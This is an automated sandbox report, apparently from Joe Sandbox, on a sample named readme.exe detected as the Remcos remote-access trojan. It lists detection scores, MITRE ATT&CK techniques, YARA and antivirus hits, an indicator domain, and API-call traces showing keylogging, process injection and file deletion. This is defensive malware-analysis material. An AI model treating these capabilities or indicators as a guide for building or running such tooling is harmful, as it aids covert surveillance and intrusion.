Analysis Report readme.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:228452
Start date:07.05.2020
Start time:22:19:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:readme.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed:36
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@58/25@7/2
EGA Information:
  • Successful, ratio: 57.1%
HDC Information:
  • Successful, ratio: 35.9% (good quality ratio 29.9%)
  • Quality average: 69.5%
  • Quality standard deviation: 37.3%
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 112
  • Number of non-executed functions: 265
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 172.217.18.14, 172.217.18.110, 23.210.248.85, 205.185.216.10, 205.185.216.42, 23.37.58.89
  • Excluded domains from analysis (whitelisted): docs.google.com, fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e5684.g.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, drive.google.com, prod.fs.microsoft.com.akadns.net
  • Execution Graph export aborted for target mshta.exe, PID 4184 because there are no executed functions
  • Execution Graph export aborted for target mshta.exe, PID 764 because there are no executed functions
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:Remcos
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false

Classification Spiderchart

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



MITRE ATT&CK Matrix

Techniques are listed per tactic column; the numbers in parentheses are the signature-count superscripts shown next to a technique in the original matrix.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise; Trusted Relationship; Hardware Additions; Masquerade as Legitimate Application
Execution: PowerShell (1); Scripting (112); Execution through API (1); Graphical User Interface (11); Command-Line Interface (11); Service Execution (2); Scheduled Task (1); Third-party Software; Rundll32; PowerShell; Execution through API; Regsvr32
Persistence: Registry Run Keys / Startup Folder (1); Scheduled Task (1); Modify Existing Service (1); Application Shimming (1); New Service (1); Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking; Change Default File Association; File System Permissions Weakness; New Service
Privilege Escalation: Access Token Manipulation (1); Process Injection (622); Scheduled Task (1); Application Shimming (1); New Service (1); New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness; Exploitation for Privilege Escalation; Valid Accounts; Bypass User Account Control
Defense Evasion: Software Packing (11); Deobfuscate/Decode Files or Information (1); Scripting (112); File Deletion (1); Obfuscated Files or Information (3); Masquerading (331); Modify Registry (1); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Timestomp (1); Process Injection (622); DLL Side-Loading (1)
Credential Access: Credential Dumping (1); Credentials in Files (2); Input Capture (221); Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt; Keychain; Private Keys; Securityd Memory
Discovery: System Time Discovery (1); Account Discovery (1); Security Software Discovery (21); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (45); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Remote System Discovery (1); Permission Groups Discovery
Lateral Movement: Remote File Copy (21); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares; Taint Shared Content; Replication Through Removable Media; Pass the Ticket
Collection: Screen Capture (1); Email Collection (1); Input Capture (221); Clipboard Data (2); Data Staged; Screen Capture; Email Collection; Clipboard Data; Automated Collection; Audio Capture; Video Capture; Man in the Browser
Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium; Commonly Used Port; Standard Application Layer Protocol; Alternate Network Mediums
Command and Control: Uncommonly Used Port (1); Remote File Copy (21); Standard Cryptographic Protocol (12); Remote Access Tools (1); Standard Non-Application Layer Protocol (1); Standard Application Layer Protocol (2); Uncommonly Used Port; Standard Application Layer Protocol; Multilayer Encryption; Connection Proxy; Communication Through Removable Media; Custom Command and Control Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Defacement (1); Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Disk Structure Wipe; Disk Content Wipe

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: u864246.nvpn.so; Virustotal: Detection: 13%
Yara detected Remcos RAT
Source: Yara match; File source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ieinstal.exe PID: 4880, type: MEMORY
Source: Yara match; File source: Process Memory Space: ieinstal.exe PID: 3944, type: MEMORY
Source: Yara match; File source: Process Memory Space: ieinstal.exe PID: 2272, type: MEMORY
Source: Yara match; File source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 20.2.ieinstal.exe.10530000.2.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 29.2.Htdrset.exe.10530000.7.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 34.2.ieinstal.exe.10530000.2.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 21.2.Htdrset.exe.10530000.7.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.2.readme.exe.10530000.7.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 33.2.ieinstal.exe.10530000.2.unpack; Avira: Label: TR/Crypt.Morphine.Gen
Source: 34.2.ieinstal.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 33.2.ieinstal.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen
Source: 20.2.ieinstal.exe.400000.0.unpack; Avira: Label: BDS/Backdoor.Gen

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_0040740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_004104E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@
std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t20_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QB
EPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_t
raits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA20_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose (20_2_004126D3)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$ba
sic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,20_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_10538C57 getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose (20_2_10538C57)
